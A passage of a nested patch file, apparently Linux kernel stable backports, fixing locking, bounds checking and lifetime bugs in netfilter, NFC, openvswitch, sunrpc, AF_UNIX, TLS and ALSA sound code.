+ 	}
+ 
+ 	return skb_copy_bits(skb, offset + mac_off, dst_u8, len) == 0;
+@@ -118,6 +109,17 @@ static int nft_payload_inner_offset(const struct nft_pktinfo *pkt)
+ 	return pkt->inneroff;
+ }
+ 
++static bool nft_payload_need_vlan_adjust(u32 offset, u32 len)
++{
++	unsigned int boundary = offset + len;
++
++	/* data past ether src/dst requested, copy needed */
++	if (boundary > offsetof(struct ethhdr, h_proto))
++		return true;
++
++	return false;
++}
++
+ void nft_payload_eval(const struct nft_expr *expr,
+ 		      struct nft_regs *regs,
+ 		      const struct nft_pktinfo *pkt)
+@@ -135,7 +137,8 @@ void nft_payload_eval(const struct nft_expr *expr,
+ 		if (!skb_mac_header_was_set(skb) || skb_mac_header_len(skb) == 0)
+ 			goto err;
+ 
+-		if (skb_vlan_tag_present(skb)) {
++		if (skb_vlan_tag_present(skb) &&
++		    nft_payload_need_vlan_adjust(priv->offset, priv->len)) {
+ 			if (!nft_payload_copy_vlan(dest, skb,
+ 						   priv->offset, priv->len))
+ 				goto err;
+@@ -665,21 +668,89 @@ static int nft_payload_csum_inet(struct sk_buff *skb, const u32 *src,
+ 	return 0;
+ }
+ 
++struct nft_payload_set {
++	enum nft_payload_bases	base:8;
++	u8			offset;
++	u8			len;
++	u8			sreg;
++	u8			csum_type;
++	u8			csum_offset;
++	u8			csum_flags;
++};
++
++/* This is not struct vlan_hdr. */
++struct nft_payload_vlan_hdr {
++	__be16			h_vlan_proto;
++	__be16			h_vlan_TCI;
++};
++
++static bool
++nft_payload_set_vlan(const u32 *src, struct sk_buff *skb, u8 offset, u8 len,
++		     int *vlan_hlen)
++{
++	struct nft_payload_vlan_hdr *vlanh;
++	__be16 vlan_proto;
++	u16 vlan_tci;
++
++	if (offset >= offsetof(struct vlan_ethhdr, h_vlan_encapsulated_proto)) {
++		*vlan_hlen = VLAN_HLEN;
++		return true;
++	}
++
++	switch (offset) {
++	case offsetof(struct vlan_ethhdr, h_vlan_proto):
++		if (len == 2) {
++			vlan_proto = nft_reg_load_be16(src);
++			skb->vlan_proto = vlan_proto;
++		} else if (len == 4) {
++			vlanh = (struct nft_payload_vlan_hdr *)src;
++			__vlan_hwaccel_put_tag(skb, vlanh->h_vlan_proto,
++					       ntohs(vlanh->h_vlan_TCI));
++		} else {
++			return false;
++		}
++		break;
++	case offsetof(struct vlan_ethhdr, h_vlan_TCI):
++		if (len != 2)
++			return false;
++
++		vlan_tci = ntohs(nft_reg_load_be16(src));
++		skb->vlan_tci = vlan_tci;
++		break;
++	default:
++		return false;
++	}
++
++	return true;
++}
++
+ static void nft_payload_set_eval(const struct nft_expr *expr,
+ 				 struct nft_regs *regs,
+ 				 const struct nft_pktinfo *pkt)
+ {
+ 	const struct nft_payload_set *priv = nft_expr_priv(expr);
+-	struct sk_buff *skb = pkt->skb;
+ 	const u32 *src = &regs->data[priv->sreg];
+-	int offset, csum_offset;
++	int offset, csum_offset, vlan_hlen = 0;
++	struct sk_buff *skb = pkt->skb;
+ 	__wsum fsum, tsum;
+ 
+ 	switch (priv->base) {
+ 	case NFT_PAYLOAD_LL_HEADER:
+ 		if (!skb_mac_header_was_set(skb))
+ 			goto err;
+-		offset = skb_mac_header(skb) - skb->data;
++
++		if (skb_vlan_tag_present(skb) &&
++		    nft_payload_need_vlan_adjust(priv->offset, priv->len)) {
++			if (!nft_payload_set_vlan(src, skb,
++						  priv->offset, priv->len,
++						  &vlan_hlen))
++				goto err;
++
++			if (!vlan_hlen)
++				return;
++		}
++
++		offset = skb_mac_header(skb) - skb->data - vlan_hlen;
+ 		break;
+ 	case NFT_PAYLOAD_NETWORK_HEADER:
+ 		offset = skb_network_offset(skb);
+diff --git a/net/netrom/nr_route.c b/net/netrom/nr_route.c
+index 70480869ad1c5..bd2b17b219ae9 100644
+--- a/net/netrom/nr_route.c
++++ b/net/netrom/nr_route.c
+@@ -285,22 +285,14 @@ static int __must_check nr_add_node(ax25_address *nr, const char *mnemonic,
+ 	return 0;
+ }
+ 
+-static inline void __nr_remove_node(struct nr_node *nr_node)
++static void nr_remove_node_locked(struct nr_node *nr_node)
+ {
++	lockdep_assert_held(&nr_node_list_lock);
++
+ 	hlist_del_init(&nr_node->node_node);
+ 	nr_node_put(nr_node);
+ }
+ 
+-#define nr_remove_node_locked(__node) \
+-	__nr_remove_node(__node)
+-
+-static void nr_remove_node(struct nr_node *nr_node)
+-{
+-	spin_lock_bh(&nr_node_list_lock);
+-	__nr_remove_node(nr_node);
+-	spin_unlock_bh(&nr_node_list_lock);
+-}
+-
+ static inline void __nr_remove_neigh(struct nr_neigh *nr_neigh)
+ {
+ 	hlist_del_init(&nr_neigh->neigh_node);
+@@ -339,6 +331,7 @@ static int nr_del_node(ax25_address *callsign, ax25_address *neighbour, struct n
+ 		return -EINVAL;
+ 	}
+ 
++	spin_lock_bh(&nr_node_list_lock);
+ 	nr_node_lock(nr_node);
+ 	for (i = 0; i < nr_node->count; i++) {
+ 		if (nr_node->routes[i].neighbour == nr_neigh) {
+@@ -352,7 +345,7 @@ static int nr_del_node(ax25_address *callsign, ax25_address *neighbour, struct n
+ 			nr_node->count--;
+ 
+ 			if (nr_node->count == 0) {
+-				nr_remove_node(nr_node);
++				nr_remove_node_locked(nr_node);
+ 			} else {
+ 				switch (i) {
+ 				case 0:
+@@ -367,12 +360,14 @@ static int nr_del_node(ax25_address *callsign, ax25_address *neighbour, struct n
+ 				nr_node_put(nr_node);
+ 			}
+ 			nr_node_unlock(nr_node);
++			spin_unlock_bh(&nr_node_list_lock);
+ 
+ 			return 0;
+ 		}
+ 	}
+ 	nr_neigh_put(nr_neigh);
+ 	nr_node_unlock(nr_node);
++	spin_unlock_bh(&nr_node_list_lock);
+ 	nr_node_put(nr_node);
+ 
+ 	return -EINVAL;
+diff --git a/net/nfc/nci/core.c b/net/nfc/nci/core.c
+index f76a2d8060340..6196bb512dfc1 100644
+--- a/net/nfc/nci/core.c
++++ b/net/nfc/nci/core.c
+@@ -1462,6 +1462,19 @@ int nci_core_ntf_packet(struct nci_dev *ndev, __u16 opcode,
+ 				 ndev->ops->n_core_ops);
+ }
+ 
++static bool nci_valid_size(struct sk_buff *skb)
++{
++	BUILD_BUG_ON(NCI_CTRL_HDR_SIZE != NCI_DATA_HDR_SIZE);
++	unsigned int hdr_size = NCI_CTRL_HDR_SIZE;
++
++	if (skb->len < hdr_size ||
++	    !nci_plen(skb->data) ||
++	    skb->len < hdr_size + nci_plen(skb->data)) {
++		return false;
++	}
++	return true;
++}
++
+ /* ---- NCI TX Data worker thread ---- */
+ 
+ static void nci_tx_work(struct work_struct *work)
+@@ -1512,9 +1525,9 @@ static void nci_rx_work(struct work_struct *work)
+ 		nfc_send_to_raw_sock(ndev->nfc_dev, skb,
+ 				     RAW_PAYLOAD_NCI, NFC_DIRECTION_RX);
+ 
+-		if (!nci_plen(skb->data)) {
++		if (!nci_valid_size(skb)) {
+ 			kfree_skb(skb);
+-			break;
++			continue;
+ 		}
+ 
+ 		/* Process frame */
+diff --git a/net/openvswitch/actions.c b/net/openvswitch/actions.c
+index a8cf9a88758ef..21102ffe44709 100644
+--- a/net/openvswitch/actions.c
++++ b/net/openvswitch/actions.c
+@@ -924,6 +924,12 @@ static void do_output(struct datapath *dp, struct sk_buff *skb, int out_port,
+ 				pskb_trim(skb, ovs_mac_header_len(key));
+ 		}
+ 
++		/* Need to set the pkt_type to involve the routing layer.  The
++		 * packet movement through the OVS datapath doesn't generally
++		 * use routing, but this is needed for tunnel cases.
++		 */
++		skb->pkt_type = PACKET_OUTGOING;
++
+ 		if (likely(!mru ||
+ 		           (skb->len <= mru + vport->dev->hard_header_len))) {
+ 			ovs_vport_send(vport, skb, ovs_key_mac_proto(key));
+diff --git a/net/openvswitch/flow.c b/net/openvswitch/flow.c
+index e20d1a9734175..78960a8a38925 100644
+--- a/net/openvswitch/flow.c
++++ b/net/openvswitch/flow.c
+@@ -558,7 +558,6 @@ static int parse_icmpv6(struct sk_buff *skb, struct sw_flow_key *key,
+ 	 */
+ 	key->tp.src = htons(icmp->icmp6_type);
+ 	key->tp.dst = htons(icmp->icmp6_code);
+-	memset(&key->ipv6.nd, 0, sizeof(key->ipv6.nd));
+ 
+ 	if (icmp->icmp6_code == 0 &&
+ 	    (icmp->icmp6_type == NDISC_NEIGHBOUR_SOLICITATION ||
+@@ -567,6 +566,8 @@ static int parse_icmpv6(struct sk_buff *skb, struct sw_flow_key *key,
+ 		struct nd_msg *nd;
+ 		int offset;
+ 
++		memset(&key->ipv6.nd, 0, sizeof(key->ipv6.nd));
++
+ 		/* In order to process neighbor discovery options, we need the
+ 		 * entire packet.
+ 		 */
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 7188ca8d84693..8888c09931ce3 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -2528,8 +2528,7 @@ static void tpacket_destruct_skb(struct sk_buff *skb)
+ 		ts = __packet_set_timestamp(po, ph, skb);
+ 		__packet_set_status(po, ph, TP_STATUS_AVAILABLE | ts);
+ 
+-		if (!packet_read_pending(&po->tx_ring))
+-			complete(&po->skb_completion);
++		complete(&po->skb_completion);
+ 	}
+ 
+ 	sock_wfree(skb);
+diff --git a/net/qrtr/ns.c b/net/qrtr/ns.c
+index 4a13b9f7abb44..3c513e7ca2d5c 100644
+--- a/net/qrtr/ns.c
++++ b/net/qrtr/ns.c
+@@ -807,6 +807,24 @@ int qrtr_ns_init(void)
+ 	if (ret < 0)
+ 		goto err_wq;
+ 
++	/* As the qrtr ns socket owner and creator is the same module, we have
++	 * to decrease the qrtr module reference count to guarantee that it
++	 * remains zero after the ns socket is created, otherwise, executing
++	 * "rmmod" command is unable to make the qrtr module deleted after the
++	 *  qrtr module is inserted successfully.
++	 *
++	 * However, the reference count is increased twice in
++	 * sock_create_kern(): one is to increase the reference count of owner
++	 * of qrtr socket's proto_ops struct; another is to increment the
++	 * reference count of owner of qrtr proto struct. Therefore, we must
++	 * decrement the module reference count twice to ensure that it keeps
++	 * zero after server's listening socket is created. Of course, we
++	 * must bump the module reference count twice as well before the socket
++	 * is closed.
++	 */
++	module_put(qrtr_ns.sock->ops->owner);
++	module_put(qrtr_ns.sock->sk->sk_prot_creator->owner);
++
+ 	return 0;
+ 
+ err_wq:
+@@ -821,6 +839,15 @@ void qrtr_ns_remove(void)
+ {
+ 	cancel_work_sync(&qrtr_ns.work);
+ 	destroy_workqueue(qrtr_ns.workqueue);
++
++	/* sock_release() expects the two references that were put during
++	 * qrtr_ns_init(). This function is only called during module remove,
++	 * so try_stop_module() has already set the refcnt to 0. Use
++	 * __module_get() instead of try_module_get() to successfully take two
++	 * references.
++	 */
++	__module_get(qrtr_ns.sock->ops->owner);
++	__module_get(qrtr_ns.sock->sk->sk_prot_creator->owner);
+ 	sock_release(qrtr_ns.sock);
+ }
+ EXPORT_SYMBOL_GPL(qrtr_ns_remove);
+diff --git a/net/sunrpc/auth_gss/svcauth_gss.c b/net/sunrpc/auth_gss/svcauth_gss.c
+index bdc34ea0d939d..d0575747ff0e1 100644
+--- a/net/sunrpc/auth_gss/svcauth_gss.c
++++ b/net/sunrpc/auth_gss/svcauth_gss.c
+@@ -1132,17 +1132,11 @@ gss_read_verf(struct rpc_gss_wire_cred *gc,
+ 
+ static void gss_free_in_token_pages(struct gssp_in_token *in_token)
+ {
+-	u32 inlen;
+ 	int i;
+ 
+ 	i = 0;
+-	inlen = in_token->page_len;
+-	while (inlen) {
+-		if (in_token->pages[i])
+-			put_page(in_token->pages[i]);
+-		inlen -= inlen > PAGE_SIZE ? PAGE_SIZE : inlen;
+-	}
+-
++	while (in_token->pages[i])
++		put_page(in_token->pages[i++]);
+ 	kfree(in_token->pages);
+ 	in_token->pages = NULL;
+ }
+@@ -1168,7 +1162,7 @@ static int gss_read_proxy_verf(struct svc_rqst *rqstp,
+ 	}
+ 
+ 	pages = DIV_ROUND_UP(inlen, PAGE_SIZE);
+-	in_token->pages = kcalloc(pages, sizeof(struct page *), GFP_KERNEL);
++	in_token->pages = kcalloc(pages + 1, sizeof(struct page *), GFP_KERNEL);
+ 	if (!in_token->pages) {
+ 		kfree(in_handle->data);
+ 		return SVC_DENIED;
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index b774028e4aa8f..1dbad41c46145 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -1047,6 +1047,7 @@ struct rpc_clnt *rpc_bind_new_program(struct rpc_clnt *old,
+ 		.authflavor	= old->cl_auth->au_flavor,
+ 		.cred		= old->cl_cred,
+ 		.stats		= old->cl_stats,
++		.timeout	= old->cl_timeout,
+ 	};
+ 	struct rpc_clnt *clnt;
+ 	int err;
+diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
+index 9b0b21cccca9a..666d738bcf07e 100644
+--- a/net/sunrpc/svc.c
++++ b/net/sunrpc/svc.c
+@@ -1205,8 +1205,6 @@ svc_generic_init_request(struct svc_rqst *rqstp,
+ 	if (rqstp->rq_proc >= versp->vs_nproc)
+ 		goto err_bad_proc;
+ 	rqstp->rq_procinfo = procp = &versp->vs_proc[rqstp->rq_proc];
+-	if (!procp)
+-		goto err_bad_proc;
+ 
+ 	/* Initialize storage for argp and resp */
+ 	memset(rqstp->rq_argp, 0, procp->pc_argzero);
+diff --git a/net/sunrpc/xprtrdma/verbs.c b/net/sunrpc/xprtrdma/verbs.c
+index 28c0771c4e8c3..4f71627ba39ce 100644
+--- a/net/sunrpc/xprtrdma/verbs.c
++++ b/net/sunrpc/xprtrdma/verbs.c
+@@ -244,7 +244,11 @@ rpcrdma_cm_event_handler(struct rdma_cm_id *id, struct rdma_cm_event *event)
+ 	case RDMA_CM_EVENT_DEVICE_REMOVAL:
+ 		pr_info("rpcrdma: removing device %s for %pISpc\n",
+ 			ep->re_id->device->name, sap);
+-		fallthrough;
++		switch (xchg(&ep->re_connect_status, -ENODEV)) {
++		case 0: goto wake_connect_worker;
++		case 1: goto disconnected;
++		}
++		return 0;
+ 	case RDMA_CM_EVENT_ADDR_CHANGE:
+ 		ep->re_connect_status = -ENODEV;
+ 		goto disconnected;
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index 6b7189a520af7..75cd20c0e3fdb 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -910,9 +910,17 @@ struct tls_context *tls_ctx_create(struct sock *sk)
+ 		return NULL;
+ 
+ 	mutex_init(&ctx->tx_lock);
+-	rcu_assign_pointer(icsk->icsk_ulp_data, ctx);
+ 	ctx->sk_proto = READ_ONCE(sk->sk_prot);
+ 	ctx->sk = sk;
++	/* Release semantic of rcu_assign_pointer() ensures that
++	 * ctx->sk_proto is visible before changing sk->sk_prot in
++	 * update_sk_prot(), and prevents reading uninitialized value in
++	 * tls_{getsockopt, setsockopt}. Note that we do not need a
++	 * read barrier in tls_{getsockopt,setsockopt} as there is an
++	 * address dependency between sk->sk_proto->{getsockopt,setsockopt}
++	 * and ctx->sk_proto.
++	 */
++	rcu_assign_pointer(icsk->icsk_ulp_data, ctx);
+ 	return ctx;
+ }
+ 
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index f28e2956fea58..7d2a3b42b456a 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1121,8 +1121,8 @@ static struct sock *unix_find_other(struct net *net,
+ 
+ static int unix_autobind(struct sock *sk)
+ {
+-	unsigned int new_hash, old_hash = sk->sk_hash;
+ 	struct unix_sock *u = unix_sk(sk);
++	unsigned int new_hash, old_hash;
+ 	struct net *net = sock_net(sk);
+ 	struct unix_address *addr;
+ 	u32 lastnum, ordernum;
+@@ -1145,6 +1145,7 @@ static int unix_autobind(struct sock *sk)
+ 	addr->name->sun_family = AF_UNIX;
+ 	refcount_set(&addr->refcnt, 1);
+ 
++	old_hash = sk->sk_hash;
+ 	ordernum = get_random_u32();
+ 	lastnum = ordernum & 0xFFFFF;
+ retry:
+@@ -1185,8 +1186,8 @@ static int unix_bind_bsd(struct sock *sk, struct sockaddr_un *sunaddr,
+ {
+ 	umode_t mode = S_IFSOCK |
+ 	       (SOCK_INODE(sk->sk_socket)->i_mode & ~current_umask());
+-	unsigned int new_hash, old_hash = sk->sk_hash;
+ 	struct unix_sock *u = unix_sk(sk);
++	unsigned int new_hash, old_hash;
+ 	struct net *net = sock_net(sk);
+ 	struct user_namespace *ns; // barf...
+ 	struct unix_address *addr;
+@@ -1227,6 +1228,7 @@ static int unix_bind_bsd(struct sock *sk, struct sockaddr_un *sunaddr,
+ 	if (u->addr)
+ 		goto out_unlock;
+ 
++	old_hash = sk->sk_hash;
+ 	new_hash = unix_bsd_hash(d_backing_inode(dentry));
+ 	unix_table_double_lock(net, old_hash, new_hash);
+ 	u->path.mnt = mntget(parent.mnt);
+@@ -1254,8 +1256,8 @@ static int unix_bind_bsd(struct sock *sk, struct sockaddr_un *sunaddr,
+ static int unix_bind_abstract(struct sock *sk, struct sockaddr_un *sunaddr,
+ 			      int addr_len)
+ {
+-	unsigned int new_hash, old_hash = sk->sk_hash;
+ 	struct unix_sock *u = unix_sk(sk);
++	unsigned int new_hash, old_hash;
+ 	struct net *net = sock_net(sk);
+ 	struct unix_address *addr;
+ 	int err;
+@@ -1273,6 +1275,7 @@ static int unix_bind_abstract(struct sock *sk, struct sockaddr_un *sunaddr,
+ 		goto out_mutex;
+ 	}
+ 
++	old_hash = sk->sk_hash;
+ 	new_hash = unix_abstract_hash(addr->name, addr->len, sk->sk_type);
+ 	unix_table_double_lock(net, old_hash, new_hash);
+ 
+@@ -2137,13 +2140,15 @@ static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other
+ 	maybe_add_creds(skb, sock, other);
+ 	skb_get(skb);
+ 
++	scm_stat_add(other, skb);
++
++	spin_lock(&other->sk_receive_queue.lock);
+ 	if (ousk->oob_skb)
+ 		consume_skb(ousk->oob_skb);
+-
+ 	WRITE_ONCE(ousk->oob_skb, skb);
++	__skb_queue_tail(&other->sk_receive_queue, skb);
++	spin_unlock(&other->sk_receive_queue.lock);
+ 
+-	scm_stat_add(other, skb);
+-	skb_queue_tail(&other->sk_receive_queue, skb);
+ 	sk_send_sigurg(other);
+ 	unix_state_unlock(other);
+ 	other->sk_data_ready(other);
+@@ -2189,7 +2194,7 @@ static int unix_stream_sendmsg(struct socket *sock, struct msghdr *msg,
+ 			goto out_err;
+ 	}
+ 
+-	if (sk->sk_shutdown & SEND_SHUTDOWN)
++	if (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN)
+ 		goto pipe_err;
+ 
+ 	while (sent < len) {
+@@ -2626,8 +2631,10 @@ static int unix_stream_recv_urg(struct unix_stream_read_state *state)
+ 
+ 	mutex_lock(&u->iolock);
+ 	unix_state_lock(sk);
++	spin_lock(&sk->sk_receive_queue.lock);
+ 
+ 	if (sock_flag(sk, SOCK_URGINLINE) || !u->oob_skb) {
++		spin_unlock(&sk->sk_receive_queue.lock);
+ 		unix_state_unlock(sk);
+ 		mutex_unlock(&u->iolock);
+ 		return -EINVAL;
+@@ -2639,6 +2646,8 @@ static int unix_stream_recv_urg(struct unix_stream_read_state *state)
+ 		WRITE_ONCE(u->oob_skb, NULL);
+ 	else
+ 		skb_get(oob_skb);
++
++	spin_unlock(&sk->sk_receive_queue.lock);
+ 	unix_state_unlock(sk);
+ 
+ 	chunk = state->recv_actor(oob_skb, 0, chunk, state);
+@@ -2667,6 +2676,10 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 		consume_skb(skb);
+ 		skb = NULL;
+ 	} else {
++		struct sk_buff *unlinked_skb = NULL;
++
++		spin_lock(&sk->sk_receive_queue.lock);
++
+ 		if (skb == u->oob_skb) {
+ 			if (copied) {
+ 				skb = NULL;
+@@ -2678,13 +2691,19 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 			} else if (flags & MSG_PEEK) {
+ 				skb = NULL;
+ 			} else {
+-				skb_unlink(skb, &sk->sk_receive_queue);
++				__skb_unlink(skb, &sk->sk_receive_queue);
+ 				WRITE_ONCE(u->oob_skb, NULL);
+-				if (!WARN_ON_ONCE(skb_unref(skb)))
+-					kfree_skb(skb);
++				unlinked_skb = skb;
+ 				skb = skb_peek(&sk->sk_receive_queue);
+ 			}
+ 		}
++
++		spin_unlock(&sk->sk_receive_queue.lock);
++
++		if (unlinked_skb) {
++			WARN_ON_ONCE(skb_unref(unlinked_skb));
++			kfree_skb(unlinked_skb);
++		}
+ 	}
+ 	return skb;
+ }
+diff --git a/net/wireless/trace.h b/net/wireless/trace.h
+index cb5c3224e038a..137937b1f4b39 100644
+--- a/net/wireless/trace.h
++++ b/net/wireless/trace.h
+@@ -1734,7 +1734,7 @@ TRACE_EVENT(rdev_return_void_tx_rx,
+ 
+ DECLARE_EVENT_CLASS(tx_rx_evt,
+ 	TP_PROTO(struct wiphy *wiphy, u32 tx, u32 rx),
+-	TP_ARGS(wiphy, rx, tx),
++	TP_ARGS(wiphy, tx, rx),
+ 	TP_STRUCT__entry(
+ 		WIPHY_ENTRY
+ 		__field(u32, tx)
+@@ -1751,7 +1751,7 @@ DECLARE_EVENT_CLASS(tx_rx_evt,
+ 
+ DEFINE_EVENT(tx_rx_evt, rdev_set_antenna,
+ 	TP_PROTO(struct wiphy *wiphy, u32 tx, u32 rx),
+-	TP_ARGS(wiphy, rx, tx)
++	TP_ARGS(wiphy, tx, rx)
+ );
+ 
+ DECLARE_EVENT_CLASS(wiphy_netdev_id_evt,
+diff --git a/scripts/kconfig/symbol.c b/scripts/kconfig/symbol.c
+index a76925b46ce63..7b1df55b01767 100644
+--- a/scripts/kconfig/symbol.c
++++ b/scripts/kconfig/symbol.c
+@@ -13,18 +13,21 @@
+ 
+ struct symbol symbol_yes = {
+ 	.name = "y",
++	.type = S_TRISTATE,
+ 	.curr = { "y", yes },
+ 	.flags = SYMBOL_CONST|SYMBOL_VALID,
+ };
+ 
+ struct symbol symbol_mod = {
+ 	.name = "m",
++	.type = S_TRISTATE,
+ 	.curr = { "m", mod },
+ 	.flags = SYMBOL_CONST|SYMBOL_VALID,
+ };
+ 
+ struct symbol symbol_no = {
+ 	.name = "n",
++	.type = S_TRISTATE,
+ 	.curr = { "n", no },
+ 	.flags = SYMBOL_CONST|SYMBOL_VALID,
+ };
+@@ -775,8 +778,7 @@ const char *sym_get_string_value(struct symbol *sym)
+ 		case no:
+ 			return "n";
+ 		case mod:
+-			sym_calc_value(modules_sym);
+-			return (modules_sym->curr.tri == no) ? "n" : "m";
++			return "m";
+ 		case yes:
+ 			return "y";
+ 		}
+diff --git a/sound/core/init.c b/sound/core/init.c
+index 5377f94eb2111..3f08104e9366b 100644
+--- a/sound/core/init.c
++++ b/sound/core/init.c
+@@ -307,8 +307,8 @@ static int snd_card_init(struct snd_card *card, struct device *parent,
+ 	card->number = idx;
+ #ifdef MODULE
+ 	WARN_ON(!module);
+-	card->module = module;
+ #endif
++	card->module = module;
+ 	INIT_LIST_HEAD(&card->devices);
+ 	init_rwsem(&card->controls_rwsem);
+ 	rwlock_init(&card->ctl_files_rwlock);
+@@ -518,6 +518,14 @@ int snd_card_disconnect(struct snd_card *card)
+ 	}
+ 	spin_unlock(&card->files_lock);	
+ 
++#ifdef CONFIG_PM
++	/* wake up sleepers here before other callbacks for avoiding potential
++	 * deadlocks with other locks (e.g. in kctls);
++	 * then this notifies the shutdown and sleepers would abort immediately
++	 */
++	wake_up_all(&card->power_sleep);
++#endif
++
+ 	/* notify all connected devices about disconnection */
+ 	/* at this point, they cannot respond to any calls except release() */
+ 
+@@ -533,6 +541,11 @@ int snd_card_disconnect(struct snd_card *card)
+ 		synchronize_irq(card->sync_irq);
+ 
+ 	snd_info_card_disconnect(card);
++#ifdef CONFIG_SND_DEBUG
++	debugfs_remove(card->debugfs_root);
++	card->debugfs_root = NULL;
++#endif
++
+ 	if (card->registered) {
+ 		device_del(&card->card_dev);
+ 		card->registered = false;
+@@ -545,7 +558,6 @@ int snd_card_disconnect(struct snd_card *card)
+ 	mutex_unlock(&snd_card_mutex);
+ 
+ #ifdef CONFIG_PM
+-	wake_up(&card->power_sleep);
+ 	snd_power_sync_ref(card);
+ #endif
+ 	return 0;	
+@@ -595,10 +607,6 @@ static int snd_card_do_free(struct snd_card *card)
+ 		dev_warn(card->dev, "unable to free card info\n");
+ 		/* Not fatal error */
+ 	}
+-#ifdef CONFIG_SND_DEBUG
+-	debugfs_remove(card->debugfs_root);
+-	card->debugfs_root = NULL;
+-#endif
+ 	if (card->release_completion)
+ 		complete(card->release_completion);
+ 	if (!card->managed)
+diff --git a/sound/core/jack.c b/sound/core/jack.c
+index 03d155ed362b4..bd795452e57bf 100644
+--- a/sound/core/jack.c
++++ b/sound/core/jack.c
+@@ -37,16 +37,18 @@ static const int jack_switch_types[SND_JACK_SWITCH_TYPES] = {
+ };
+ #endif /* CONFIG_SND_JACK_INPUT_DEV */
+ 
++static void snd_jack_remove_debugfs(struct snd_jack *jack);
++
+ static int snd_jack_dev_disconnect(struct snd_device *device)
+ {
+-#ifdef CONFIG_SND_JACK_INPUT_DEV
+ 	struct snd_jack *jack = device->device_data;
+ 
+-	mutex_lock(&jack->input_dev_lock);
+-	if (!jack->input_dev) {
+-		mutex_unlock(&jack->input_dev_lock);
++	snd_jack_remove_debugfs(jack);
++
++#ifdef CONFIG_SND_JACK_INPUT_DEV
++	guard(mutex)(&jack->input_dev_lock);
++	if (!jack->input_dev)
+ 		return 0;
+-	}
+ 
+ 	/* If the input device is registered with the input subsystem
+ 	 * then we need to use a different deallocator. */
+@@ -55,7 +57,6 @@ static int snd_jack_dev_disconnect(struct snd_device *device)
+ 	else
+ 		input_free_device(jack->input_dev);
+ 	jack->input_dev = NULL;
+-	mutex_unlock(&jack->input_dev_lock);
+ #endif /* CONFIG_SND_JACK_INPUT_DEV */
+ 	return 0;
+ }
+@@ -94,11 +95,9 @@ static int snd_jack_dev_register(struct snd_device *device)
+ 	snprintf(jack->name, sizeof(jack->name), "%s %s",
+ 		 card->shortname, jack->id);
+ 
+-	mutex_lock(&jack->input_dev_lock);
+-	if (!jack->input_dev) {
+-		mutex_unlock(&jack->input_dev_lock);
++	guard(mutex)(&jack->input_dev_lock);
++	if (!jack->input_dev)
+ 		return 0;
+-	}
+ 
+ 	jack->input_dev->name = jack->name;
+ 
+@@ -123,7 +122,6 @@ static int snd_jack_dev_register(struct snd_device *device)
+ 	if (err == 0)
+ 		jack->registered = 1;
+ 
+-	mutex_unlock(&jack->input_dev_lock);
+ 	return err;
+ }
+ #endif /* CONFIG_SND_JACK_INPUT_DEV */
+@@ -389,10 +387,14 @@ static int snd_jack_debugfs_add_inject_node(struct snd_jack *jack,
+ 	return 0;
+ }
+ 
+-static void snd_jack_debugfs_clear_inject_node(struct snd_jack_kctl *jack_kctl)
++static void snd_jack_remove_debugfs(struct snd_jack *jack)
+ {
+-	debugfs_remove(jack_kctl->jack_debugfs_root);
+-	jack_kctl->jack_debugfs_root = NULL;
++	struct snd_jack_kctl *jack_kctl;
++
++	list_for_each_entry(jack_kctl, &jack->kctl_list, list) {
++		debugfs_remove(jack_kctl->jack_debugfs_root);
++		jack_kctl->jack_debugfs_root = NULL;
++	}
+ }
+ #else /* CONFIG_SND_JACK_INJECTION_DEBUG */
+ static int snd_jack_debugfs_add_inject_node(struct snd_jack *jack,
+@@ -401,7 +403,7 @@ static int snd_jack_debugfs_add_inject_node(struct snd_jack *jack,
+ 	return 0;
+ }
+ 
+-static void snd_jack_debugfs_clear_inject_node(struct snd_jack_kctl *jack_kctl)
++static void snd_jack_remove_debugfs(struct snd_jack *jack)
+ {
+ }
+ #endif /* CONFIG_SND_JACK_INJECTION_DEBUG */
+@@ -412,7 +414,6 @@ static void snd_jack_kctl_private_free(struct snd_kcontrol *kctl)
+ 
+ 	jack_kctl = kctl->private_data;
+ 	if (jack_kctl) {
+-		snd_jack_debugfs_clear_inject_node(jack_kctl);
+ 		list_del(&jack_kctl->list);
+ 		kfree(jack_kctl);
+ 	}
+@@ -505,8 +506,8 @@ int snd_jack_new(struct snd_card *card, const char *id, int type,
+ 		.dev_free = snd_jack_dev_free,
+ #ifdef CONFIG_SND_JACK_INPUT_DEV
+ 		.dev_register = snd_jack_dev_register,
+-		.dev_disconnect = snd_jack_dev_disconnect,
+ #endif /* CONFIG_SND_JACK_INPUT_DEV */
++		.dev_disconnect = snd_jack_dev_disconnect,
+ 	};
+ 
+ 	if (initial_kctl) {
+@@ -588,14 +589,9 @@ EXPORT_SYMBOL(snd_jack_new);
+ void snd_jack_set_parent(struct snd_jack *jack, struct device *parent)
+ {
+ 	WARN_ON(jack->registered);
+-	mutex_lock(&jack->input_dev_lock);
+-	if (!jack->input_dev) {
+-		mutex_unlock(&jack->input_dev_lock);
+-		return;
+-	}
+-
+-	jack->input_dev->dev.parent = parent;
+-	mutex_unlock(&jack->input_dev_lock);
++	guard(mutex)(&jack->input_dev_lock);
++	if (jack->input_dev)
++		jack->input_dev->dev.parent = parent;
+ }
+ EXPORT_SYMBOL(snd_jack_set_parent);
+ 
+diff --git a/sound/core/timer.c b/sound/core/timer.c
+index e08a37c23add8..38f3b30efae70 100644
+--- a/sound/core/timer.c
++++ b/sound/core/timer.c
+@@ -553,6 +553,16 @@ static int snd_timer_start1(struct snd_timer_instance *timeri,
+ 		goto unlock;
+ 	}
+ 
++	/* check the actual time for the start tick;
++	 * bail out as error if it's way too low (< 100us)
++	 */
++	if (start) {
++		if ((u64)snd_timer_hw_resolution(timer) * ticks < 100000) {
++			result = -EINVAL;
++			goto unlock;
++		}
++	}
++
+ 	if (start)
